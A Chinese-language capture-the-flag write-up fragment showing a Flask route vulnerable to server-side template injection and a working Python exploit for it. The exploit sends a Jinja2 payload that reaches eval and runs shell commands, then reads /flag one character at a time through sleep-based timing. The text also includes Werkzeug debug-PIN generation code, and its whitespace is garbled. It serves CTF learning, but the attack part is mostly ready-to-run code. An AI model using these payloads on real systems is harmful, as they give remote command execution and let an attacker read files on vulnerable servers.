# 下面为源码里面抄的,不需要修改 h = hashlib.sha1() for bit in chain(probably_public_bits, private_bits): ifnot bit: continue ifisinstance(bit, str): bit = bit.encode('utf-8') h.update(bit) h.update(b'cookiesalt')
cookie_name = '__wzd' + h.hexdigest()[:20]
num = None if num isNone: h.update(b'pinsalt') num = ('%09d' % int(h.hexdigest(), 16))[:9]
rv = None if rv isNone: for group_size in5, 4, 3: iflen(num) % group_size == 0: rv = '-'.join(num[x:x + group_size].rjust(group_size, '0') for x inrange(0, len(num), group_size)) break else: rv = num
@app.route('/namelist', methods=['GET']) defname_list(): name = request.args.get('name') template = '<h1>Hi, %s.</h1>' % name rendered_string = render_template_string(template) if rendered_string: return'Success Write your name to database' else: return'Error'
if __name__ == '__main__': app.run(port=8080)
输入可控+渲染,明显ssti
但不同的是,没有return,也就是ssti的结果没有回显
可以看到没有任何的过滤
由于这里是格式化输入变量name,所以用不了条件或循环控制语句{% if %}``{% for %}
import requests import time flag ='SHCTF{' table = '-ABCDEFabcdef0123456789' url = 'http://210.44.150.15:25528/namelist?name=' forleninrange(7,43): for i in table: ii = flag +i start_time = time.time() data = "{{"+"().__class__.__base__.__subclasses__()[100].__init__.__globals__['__builtins__']['eval']('__import__(\"os\").popen(\"if [ $(head -c {} /flag) = {} ]; then sleep 2; fi\").read()')".format(len,ii) +"}}" #print(data) url1 = url + data r = requests.get(url1) end_time = time.time() response_time = end_time - start_time if response_time >= 2: flag = flag +i print(flag) else: continue print(flag+'}')